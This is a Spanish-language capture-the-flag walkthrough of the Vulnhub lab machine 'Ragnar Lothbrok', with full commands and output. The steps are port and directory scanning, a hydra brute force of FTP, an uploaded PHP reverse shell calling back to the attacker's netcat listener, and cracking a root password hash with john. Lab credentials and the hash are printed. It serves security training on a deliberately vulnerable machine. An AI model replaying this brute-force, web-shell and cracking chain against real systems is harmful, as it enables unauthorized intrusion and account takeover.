[VULNHUB] Ragnar Lothbrok

Hoy vamos a hackear la maquina de Vulnhub llamada Ragnar Lothbrok. Podeis descargarla desde el siguiente enlace: Ragnar Lothbrok

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

> nmap -A -p- 192.168.1.137        
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-09 13:07 CET
Nmap scan report for armbjorn (192.168.1.137)
Host is up (0.00087s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD
80/tcp   open  http     Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h PHP/7.2.34 
mod_perl/2.0.11 Perl/v5.32.0)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34 
mod_perl/2.0.11 Perl/v5.32.0
| http-title: Welcome to XAMPP
|_Requested resource was http://armbjorn/dashboard/
443/tcp  open  ssl/http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h PHP/7.2.34 
mod_perl/2.0.11 Perl/v5.32.0)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34 
mod_perl/2.0.11 Perl/v5.32.0
| http-title: Welcome to XAMPP
|_Requested resource was https://armbjorn/dashboard/
| ssl-cert: Subject: commonName=localhost/organizationName=Apache 
Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T09:10:30
|_Not valid after:  2010-09-30T09:10:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   http/1.1
3306/tcp open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host 'aVa.home' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, 
please submit the following fingerprint at 
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.70%I=7%D=12/9%Time=5FD0BDF1%P=x86_64-pc-linux-gnu%r(NU
SF:LL,47,"C\0\0\x01\xffj\x04Host\x20'aVa\.home'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server");

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.67 seconds
De todos los puertos que tiene abiertos, empezamos examinando mas en detalle el servidor web a ver si encontramos algun fichero interesante.

> gobuster dir -u http://armbjorn -w 
/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://armbjorn
[+] Threads:        10
[+] Wordlist:       
/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.tx
t
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/09 13:02:12 Starting gobuster
===============================================================
/img (Status: 301)
/wordpress (Status: 301)
/dashboard (Status: 301)
/secret (Status: 200)
/phpmyadmin (Status: 403)
/webalizer (Status: 301)
===============================================================
2020/12/09 13:04:50 Finished
===============================================================
Vemos que esta el directorio /wordpress, al visitarlo vemos que hay un usuario llamado ragnar. Por otro lado, vemos que hay un directorio llamado /secret. Tras visitarlo, tiene pinta de ser una posible lista de passwords. Nos la descargamos :)

> wget http://armbjorn/secret -O lista.txt
Sabiendo que existe un usuario llamado ragnar, haremos brutefoce al FTP usando como diccionario el encontrado en /secret y como usuario "ragnar".

> hydra -l ragnar -P lista.txt 192.168.1.137 ftp
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-09 
13:07:27
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip 
waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4617 login tries 
(l:1/p:4617), ~289 tries per task
[DATA] attacking ftp://192.168.1.137:21/
[STATUS] 1797.00 tries/min, 1797 tries in 00:01h, 2824 to do in 00:02h, 16 
active
[STATUS] 2071.00 tries/min, 4142 tries in 00:02h, 479 to do in 00:01h, 16 active
[21][ftp] host: 192.168.1.137   login: ragnar   password: lagertha
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-09 
13:09:49
Conseguimos el password! Nos logueamos en el FTP.

> ftp 192.168.1.137                                                         
                                                                           
Connected to 192.168.1.137.
220 ProFTPD Server (ProFTPD) [::ffff:192.168.1.137]
Name (192.168.1.137:sml): ragnar
331 Password required for ragnar
Password:
230 User ragnar logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x   1 33       33           3607 Aug 27  2019 applications.html
-rwxrwxr-x   1 33       33            177 Aug 27  2019 bitnami.css
drwxrwxr-x  21 33       33           4096 Dec  3 18:16 dashboard
-rwxrwxr-x   1 33       33          30894 May 11  2007 favicon.ico
drwxrwxr-x   2 33       33           4096 Dec  3 18:16 img
-rwxrwxr-x   1 33       33            260 Jul  9  2015 index.php
-rw-rw-r--   1 33       33          40578 Dec  3 19:00 secret
drwxrwxr-x   2 33       33           4096 Dec  3 18:14 webalizer
drwxrwxrwx   5 33       33           4096 Dec  9 12:02 wordpress
226 Transfer complete
ftp> 
Por la estructura del directorio y las carpetas que hay, se puede intuir que es la raiz del webserver... Asi que preparamos una webshell:

~ > cp /usr/share/webshells/php/php-reverse-shell.php .
~ > mv php-reverse-shell.php shell.php
~ > nano shell.php #Modificamos puerto/IP
Y la subimos!

ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful
150 Opening BINARY mode data connection for shell.php
226 Transfer complete
5496 bytes sent in 0.00 secs (124.7951 MB/s)
Una vez subida la webshell, ponemos nc a la escucha.

> nc -nlvp 1234
listening on [any] 1234 ...
Y visitamos http://armbjorn/shell.php.

Low shell



> nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.137] 58860
Linux osboxes 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 
x86_64 x86_64 x86_64 GNU/Linux
 07:11:36 up 17 min,  0 users,  load average: 4.95, 5.40, 3.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
Ya dentro del sistema, nos logueamos como ragnar con la password obtenida anteriormente.

daemon@osboxes:/$ su ragnar
Password: lagertha
Vemos que hay un fichero llamado secret. Vemos que contiene.

ragnar@osboxes:~$ /bin/cat secret
root:$6$hPrOGn8aOKa2ZMJm$gGKkorDjENhohzGBojBLO3ABOJEP/DjMtjRRl6FBlNAc.l.BnoH8rMW
tWZiJGCTt2Nq5e7DFe51RRRTXjzN5h.
Parece la pass de root :) La copiamos en nuestro sistema, y probamos a crackearla con john.

> john --wordlist=/usr/share/wordlists/rockyou.txt ~/tocrack2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
kevinmitnick     (root)
1g 0:00:05:31 DONE (2020-12-09 13:31) 0.003013g/s 2703p/s 2703c/s 2703C/s 
keya18..kete12
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Tras crackear la password, nos logueamos como root!

Privilege Escalation



ragnar@osboxes:~$ su root
Password: kevinmitnick

root.txt



root@osboxes:/home/ragnar# cd /root
root@osboxes:~# ls -la
total 56
drwx------  8 root root 4096 Dec  4 06:43 .
drwxr-xr-x 19 root root 4096 Jul 31 12:34 ..
-rw-------  1 root root  273 Dec  4 06:43 .bash_history
-rw-r--r--  1 root root    0 Dec  3 14:51 .bashrc
drwx------  5 root root 4096 Dec  3 14:24 .cache
drwxr-xr-x  5 root root 4096 Dec  3 13:52 .config
drwx------  3 root root 4096 Dec  3 13:52 .dbus
drwxr-xr-x  2 root root 4096 Dec  3 15:33 Desktop
drwx------  3 root root 4096 Dec  3 15:33 .gnupg
-rw-r--r--  1 root root  129 Dec  3 14:22 hello
drwxr-xr-x  3 root root 4096 Dec  3 11:16 .local
-rw-------  1 root root   18 Dec  3 13:02 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-------  1 root root    5 Dec  3 14:47 .python_history
-rw-r--r--  1 root root   66 Dec  3 12:36 .selected_editor
root@osboxes:~# cat hello
Congratulation Have a nice day
I'm very happy
How the little piglets would grunt if they knew how the old boar suffered

End


Y con esto ya seriamos root de la maquina.